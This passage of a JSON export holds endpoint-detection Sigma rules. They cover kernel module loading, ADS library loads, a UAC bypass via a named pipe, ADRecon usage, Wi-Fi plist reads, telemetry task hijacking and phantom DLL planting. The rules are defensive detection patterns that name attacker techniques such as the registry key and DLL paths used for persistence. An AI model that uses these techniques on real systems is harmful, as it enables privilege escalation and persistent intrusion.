/usr/bin/laptop-detect'\n - '/bin/sh -e /bin/laptop-detect'\n # McAfee\n - '/bin/bash /opt/mcafee/ens/esp/scripts//modversion-check.sh *'\n - '/bin/bash //opt/mcafee/ens/esp/scripts//modversion-check.sh *'\n # VMWare\n - '/etc/init.d/vmware start'\n - '/etc/init.d/vmware stop'\n - 'bash /etc/init.d/vmware 
start'\n - 'bash /etc/init.d/vmware stop'\n - '/bin/sh /etc/rc.d/init.d/vmware-tools start'\n - '/bin/sh /etc/rc.d/init.d/vmware-tools stop'\n # SCAP\n - 'bash /usr/bin/scap-driver-loader'\n # ALSA\n - '/bin/sh /usr/sbin/alsa force-reload'\n - 'sh -c -- /sbin/modprobe --ignore-install snd && { /sbin/modprobe --quiet --use-blacklist snd-*'\n - 'sh -c -- /sbin/modprobe --ignore-install snd-seq && { /sbin/modprobe --quiet --use-blacklist snd-*'\n - 'sh -c -- /sbin/modprobe --ignore-install snd-rawmidi && { /sbin/modprobe --quiet --use-blacklist snd-*'\n # System utilities\n - '/bin/bash /usr/bin/pf_ringctl start'\n - '/usr/lib/systemd/systemd-udevd'\n - '/bin/sh /usr/lib/os-probes/init/10filesystems'\n - '/bin/sh /usr/libexec/os-probes/init/10filesystems'\n - '/bin/bash /etc/network/iptables/iptables'\n # Veeam\n - '/usr/sbin/veeamworker --pidfile /var/run/veeamservice.pid --daemon'\n # Firewalld\n - '/usr/bin/python2 -es /usr/sbin/firewalld --nofork --nopid'\n - '/usr/libexec/platform-python -s /usr/sbin/firewalld --nofork --nopid'\n # Commvault\n - '/*/commvault/base*/cvlaunchd'\n # openipmi\n - '/bin/sh /etc/init.d/openipmi start'\n - '/bin/sh /etc/init.d/openipmi stop'\n # Veracrypt\n - '/usr/bin/veracrypt --core-service'\n # mkinitcpio\n - 'bash /usr/bin/mkinitcpio -k /boot/vmlinuz-linux -g /boot/initramfs-linux.img'\n # kdumpctl\n - '/bin/bash /usr/bin/kdumpctl start'\n # Gparted\n - '/usr/libexec/gpartedbin'\n # VPN\n - '*/sh /usr/libexec/ipsec/_stackmanager start'\n - '*/sh /etc/sysconfig/network-scripts/ifup-ipv6 *'\n # Fan\n - '/bin/sh - /usr/lib/ubuntu-fan/fan-net start'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b0391959-bd75-4da0-9f2c-a888f2fb3349",
"rule_name": "Kernel Module Loaded via Modprobe",
"rule_description": "Detects the execution of modprobe to load a kernel module manually.\nAdversaries may modify the kernel to automatically execute programs on system boot.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nThey extend the functionality of the kernel without the need to reboot the system.\nFor example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\nIt is recommended to analyze both the process calling modprobe and the loaded kernel module to look for malicious content or actions.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1547.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b050aae5-6064-4892-abde-50ff28111a90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087041Z",
"creation_date": "2026-03-23T11:45:34.087043Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087048Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/004/"
],
"name": "t1546_004_library_loaded_from_ads.yml",
"content": "title: Library Loaded from ADS\nid: b050aae5-6064-4892-abde-50ff28111a90\ndescription: |\n Detects a library loaded from an Alternate Data Stream (ADS).\n Attackers may hide malicious payloads in a file's ADS to hide their actions and evade detection.\n It is recommended to investigate the actions performed by the process that loaded the library, as well as to analyze the loaded library for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1564/004/\ndate: 2024/12/17\nmodified: 2025/10/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.004\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:*:'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b050aae5-6064-4892-abde-50ff28111a90",
"rule_name": "Library Loaded from ADS",
"rule_description": "Detects a library loaded from an Alternate Data Stream (ADS).\nAttackers may hide malicious payloads in a file's ADS to hide their actions and evade detection.\nIt is recommended to investigate the actions performed by the process that loaded the library, as well as to analyze the loaded library for malicious content.\n",
"rule_creation_date": "2024-12-17",
"rule_modified_date": "2025-10-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b05508fb-568a-49c3-b7fe-be09a6b61772",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093226Z",
"creation_date": "2026-03-23T11:45:34.093228Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/antonioCoco/SspiUacBypass/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_sspi.yml",
"content": "title: UAC Bypass via Service Control Manager Named Pipe Executed\nid: b05508fb-568a-49c3-b7fe-be09a6b61772\ndescription: |\n Detects a connection to the ntsvcs named pipe using a specific pattern.\n Attackers might use this service-related named pipe to create a new service for UAC bypass.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process making the connection and any new services created on the machine.\nreferences:\n - https://github.com/antonioCoco/SspiUacBypass/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\127.0.0.1\\pipe\\ntsvcs'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b05508fb-568a-49c3-b7fe-be09a6b61772",
"rule_name": "UAC Bypass via Service Control Manager Named Pipe Executed",
"rule_description": "Detects a connection to the ntsvcs named pipe using a specific pattern.\nAttackers might use this service-related named pipe to create a new service for UAC bypass.\nAttackers may bypass UAC mechanisms to elevate process privileges on the system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process making the connection and any new services created on the machine.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b055e773-e224-4c61-9498-88eb2239b128",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606425Z",
"creation_date": "2026-03-23T11:45:34.606428Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606436Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/",
"https://github.com/sense-of-security/ADRecon/",
"https://attack.mitre.org/techniques/T1069/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_adrecon_usage.yml",
"content": "title: ADRecon Execution\nid: b055e773-e224-4c61-9498-88eb2239b128\ndescription: |\n Detects the usage of ADRecon, a PowerShell tool designed to gather extensive information about an Active Directory environment.\n Adversaries may use this type of tool during the discovery phase to gather information about the Active Directory and corporate network.\n It is recommended to investigate the context around action to determine its legitimacy and to look for other suspicious actions on the host.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/\n - https://github.com/sense-of-security/ADRecon/\n - https://attack.mitre.org/techniques/T1069/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/05/04\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1069.002\n - attack.t1018\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Tool.ADRecon\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n - PowershellScriptPath|endswith: '\\ADRecon.ps1'\n - PowershellCommand|contains:\n - 'Function Get-ADRDomain'\n - 'Function Get-ADRForest'\n - 'Function Get-ADRTrust'\n - 'Function Get-ADRSite'\n - 'Function Get-ADRSubnet'\n - 'Function Get-ADRDefaultPasswordPolicy'\n - 'Function Get-ADRFineGrainedPasswordPolicy'\n - 'Function Get-ADRDomainController'\n - 'Function Get-ADRUser'\n - 'Function Get-ADRUserSPN'\n - 'Function Get-ADRPasswordAttributes'\n - 'Function Get-ADRGroup'\n - 'Function Get-ADRGroupMember'\n - 'Function Get-ADROU'\n - 'Function Get-ADRGPO'\n - 'Function Get-ADRGPLink'\n - 'Function Get-ADRDNSZone'\n - 'Function Get-ADRPrinter'\n - 'Function 
Get-ADRComputer'\n - 'Function Get-ADRComputerSPN'\n - 'Function Get-ADRLAPSCheck'\n - 'Function Get-ADRBitLocker'\n - 'Function Get-ADRACL'\n - 'Function Get-ADRGPOReport'\n - 'Function Get-ADRUserImpersonation'\n - 'Function Get-ADRRevertToSelf'\n - 'Function Get-ADRSPNTicket'\n - 'Function Get-ADRKerberoast'\n - 'Function Get-ADRDomainAccountsusedforServiceLogon'\n - 'Function Get-ADRAbout'\n - 'Function Invoke-ADRecon'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b055e773-e224-4c61-9498-88eb2239b128",
"rule_name": "ADRecon Execution",
"rule_description": "Detects the usage of ADRecon, a PowerShell tool designed to gather extensive information about an Active Directory environment.\nAdversaries may use this type of tool during the discovery phase to gather information about the Active Directory and corporate network.\nIt is recommended to investigate the context around the action to determine its legitimacy and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2022-05-04",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1059.001",
"attack.t1069.001",
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b05fdca4-d28a-48e3-aeaa-0003e6db65f8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617846Z",
"creation_date": "2026-03-23T11:45:34.617849Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617853Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1016/002/"
],
"name": "t1016_002_read_airport_plist.yml",
"content": "title: Suspicious Read Access to Airport Preferences\nid: b05fdca4-d28a-48e3-aeaa-0003e6db65f8\ndescription: |\n Detects a process reading sensitive files related to the Wi-Fi configuration.\n Adversaries may read these files in order to gather information about the internet connection.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1016/002/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path: '/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist'\n ProcessImage|contains: '?'\n\n filter_network_systemapp:\n ProcessImage:\n - '/System/Library/CoreServices/WiFiAgent.app/Contents/MacOS/WiFiAgent'\n - '/System/Library/CoreServices/ControlCenter.app/Contents/MacOS/ControlCenter'\n - '/System/Library/CoreServices/ControlCenter.app/Contents/XPCServices/ControlCenterHelper.xpc/Contents/MacOS/ControlCenterHelper'\n - '/System/Library/ExtensionKit/Extensions/Sharing.appex/Contents/MacOS/Sharing'\n - '/usr/sbin/WirelessRadioManagerd'\n - '/usr/sbin/system_profiler'\n - '/usr/libexec/airportd'\n - '/usr/sbin/networksetup'\n - '/system/applications/utilities/airport utility.app/contents/macos/airport utility'\n - '/usr/bin/sysdiagnose'\n\n ### system app ###\n filter_systemapp:\n 
Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_fsecure:\n Image: '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n\n ### misc\n exclusion_vscode:\n Image: '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n\n exclusion_mac_screen_recorder:\n Image: '/applications/aiseesoft mac screen recorder.app/contents/macos/loader'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_epson:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.epson.InstallNavi'\n\n exclusion_kobo:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.kobo.desktop.Kobo'\n\n exclusion_5kplayer:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.digiarty.5KPlayer'\n\n exclusion_snapgene:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.gslbiotech.snapgene'\n\n exclusion_webex:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'Cisco-Systems.Spark'\n - 'Cisco-Systems.SparkHelper'\n\n exclusion_clickshare:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.barco.clickshare'\n\n exclusion_google_earth:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.Google.GoogleEarthPro'\n\n exclusion_skype:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.skype.skype.Helper-(Renderer)'\n\n exclusion_remoteservice:\n 
ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.preference.network.remoteservice'\n\n exclusion_bluetooth:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.bluetoothd'\n\n exclusion_fixppo:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'MF.iMyFone Fixppo'\n\n exclusion_macfonelab:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.aiseesoft.mac-fonelab'\n\n exclusion_fonepaw:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.fonepaw.fonepaw-iphone-data-recovery'\n\n exclusion_fonetrans:\n - ProcessImage: '/Users/*/Mac FoneTrans.app/Contents/MacOS/CountStatistics'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.aiseesoft.mac-fonetrans'\n\n exclusion_aiseesoft:\n ProcessImage: '/Users/*/Aiseesoft iPhone Unlocker for Mac.app/Contents/MacOS/Loader'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.trolltech.qt.demo'\n\n exclusion_canon:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'jp.co.canon.MSU.app.Installer'\n\n exclusion_app_folder:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n\n exclusion_image:\n ProcessImage:\n - '/usr/bin/ditto'\n - '/sbin/md5'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b05fdca4-d28a-48e3-aeaa-0003e6db65f8",
"rule_name": "Suspicious Read Access to Airport Preferences",
"rule_description": "Detects a process reading sensitive files related to the Wi-Fi configuration.\nAdversaries may read these files in order to gather information about the internet connection.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b06cadad-e5ef-4e7d-9b96-5edc93279559",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089798Z",
"creation_date": "2026-03-23T11:45:34.089800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089805Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_registry_persistence_telemetry_hijack.yml",
"content": "title: Microsoft Compatibility Appraiser Scheduled Task Hijack\nid: b06cadad-e5ef-4e7d-9b96-5edc93279559\ndescription: |\n Detects the hijacking of the Microsoft Compatibility Appraiser scheduled task (aka Windows Telemetry) with a custom command which will be launched once a day.\n This requires administrator privileges, as a new entry in the HKLM registry hive needs to be set.\n The new command is launched as a child process of CompatTelRunner.exe.\n It is recommended to investigate the affected scheduled task as well as any spawned processes to determine if they are legitimate.\nreferences:\n - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2020/09/29\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\\\*\\Command'\n\n exclusion_details:\n Details|endswith:\n - '\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun' # Appraiser\n - '\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:UpdateAvStatus' # AvStatus\n - '\\system32\\CompatTelRunner.exe -m:devinv.dll -f:CreateDeviceInventory' # DevInv\n - '\\system32\\CompatTelRunner.exe -m:invagent.dll -f:RunUpdate' # InvAgent\n - '\\system32\\CompatTelRunner.exe -m:generaltel.dll -f:DoCensusRun'\n - '\\system32\\CompatTelRunner.exe -m:pcasvc.dll -f:QueryEncapsulationSettings'\n - 'BackupMareData'\n - '(Empty)' # Ignore empty (possibly delete)\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b06cadad-e5ef-4e7d-9b96-5edc93279559",
"rule_name": "Microsoft Compatibility Appraiser Scheduled Task Hijack",
"rule_description": "Detects the hijacking of the Microsoft Compatibility Appraiser scheduled task (aka Windows Telemetry) with a custom command which will be launched once a day.\nThis requires administrator privileges, as a new entry in the HKLM registry hive needs to be set.\nThe new command is launched as a child process of CompatTelRunner.exe.\nIt is recommended to investigate the affected scheduled task as well as any spawned processes to determine if they are legitimate.\n",
"rule_creation_date": "2020-09-29",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0b0c15c-93de-4ac0-9940-ec34b680020f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088730Z",
"creation_date": "2026-03-23T11:45:34.088732Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088737Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2024/09/05/technical-debt-of-cwindowssystem-path/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_updateapi.yml",
"content": "title: UpdateAPI.dll Phantom DLL Hijacking\nid: b0b0c15c-93de-4ac0-9940-ec34b680020f\ndescription: |\n Detects the loading of the normally non-existent UpdateAPI.dll file from the Windows folder.\n Adversaries may execute their own malicious payloads by planting a DLL in the \"C:\\windows\" path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.hexacorn.com/blog/2024/09/05/technical-debt-of-cwindowssystem-path/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/09/10\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded:\n - '?:\\Windows\\UpdateAPI.dll'\n - '?:\\Windows\\system\\UpdateAPI.dll'\n - '?:\\Windows\\system32\\UpdateAPI.dll'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b0b0c15c-93de-4ac0-9940-ec34b680020f",
"rule_name": "UpdateAPI.dll Phantom DLL Hijacking",
"rule_description": "Detects the loading of the normally non-existent UpdateAPI.dll file from the Windows folder.\nAdversaries may execute their own malicious payloads by planting a DLL in the \"C:\\windows\" path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-09-10",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0b2818b-2803-4a79-b1f2-7a0f323fc955",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622570Z",
"creation_date": "2026-03-23T11:45:34.622572Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622576Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_query_user.yml",
